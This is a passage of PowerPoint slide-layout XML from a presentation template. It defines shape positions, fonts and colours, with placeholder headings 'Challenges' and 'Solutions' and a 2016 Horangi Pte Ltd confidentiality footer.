                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Challenges</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Shape 131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4826010" y="1319757"/>
            <a:ext cx="3860789" cy="410633"/>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2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Solutions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bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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57200" y="1631950"/>
            <a:ext cx="3727450" cy="77470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Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="24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4" name="Shape 134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2406650"/>
            <a:ext cx="3727450" cy="1092199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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Custom Layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>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1631950"/>
            <a:ext cx="1981199" cy="77470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Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="24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7" name="Shape 137"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2406650"/>
            <a:ext cx="1981199" cy="1092199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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Custom Layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="lt1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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457200" y="1631950"/>
            <a:ext cx="1981199" cy="774700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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0" name="Shape 140"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2406650"/>
            <a:ext cx="1981199" cy="952499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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5_Custom Layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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457200" y="1631950"/>
            <a:ext cx="1981199" cy="774700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>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3" name="Shape 143"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2406650"/>
            <a:ext cx="1981199" cy="952499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="16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4_Custom Layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>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57200" y="1631950"/>
            <a:ext cx="1981199" cy="774700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>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6" name="Shape 146"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2406650"/>
            <a:ext cx="1981199" cy="952499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="16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7_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 20"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2057400"/>
            <a:ext cx="9099550" cy="3086098"/>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Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="60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 name="Shape 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" marR="0" lvl="2" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="1828800" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="2286000" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2743200" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="3200400" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="3657600" marR="0" lvl="8"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6_Custom Layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="EEDDCE"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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1631950"/>
            <a:ext cx="1981199" cy="774700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>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9" name="Shape 149"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2406650"/>
            <a:ext cx="1981199" cy="952499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="16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Blank">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="141414"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 150"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Shape 151"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="600075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lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>Not for public distribution • Copyright 2016 Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 152"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114550"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lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lora"/>
              <a:ea typeface="Lora"/>
              <a:cs typeface="Lora"/>
              <a:sym typeface="Lor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6_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 158"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Shape 159"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143499"/>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60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2_Section Header">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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0" y="2416175"/>
            <a:ext cx="9144000" cy="2727323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t"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2" name="Shape 162"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998" cy="2416175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" marR="0" lvl="2" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="1828800" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="2286000" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2743200" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="3200400" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="3657600" marR="0" lvl="8"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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Shape 169"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="4767262"/>
            <a:ext cx="6000900" cy="273900"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Shape 170"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114700" cy="2739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76" name="Shape 176"/>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52400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3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7" name="Shape 177"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="4767262"/>
            <a:ext cx="6000900" cy="273900"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Shape 178"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114700" cy="2739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p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 179"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Shape 180"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51435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Section Header">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457200" y="0"/>
            <a:ext cx="8153400" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="32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457200" y="1441446"/>
            <a:ext cx="3975000" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="10000" b="1"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5" name="Shape 185"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="4767262"/>
            <a:ext cx="6000900" cy="273900"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Shape 186"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114700" cy="2739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
        <p:nvSpPr>
          <p:cNvPr id="187" name="Shape 187"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3003550"/>
            <a:ext cx="3975000" cy="831900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
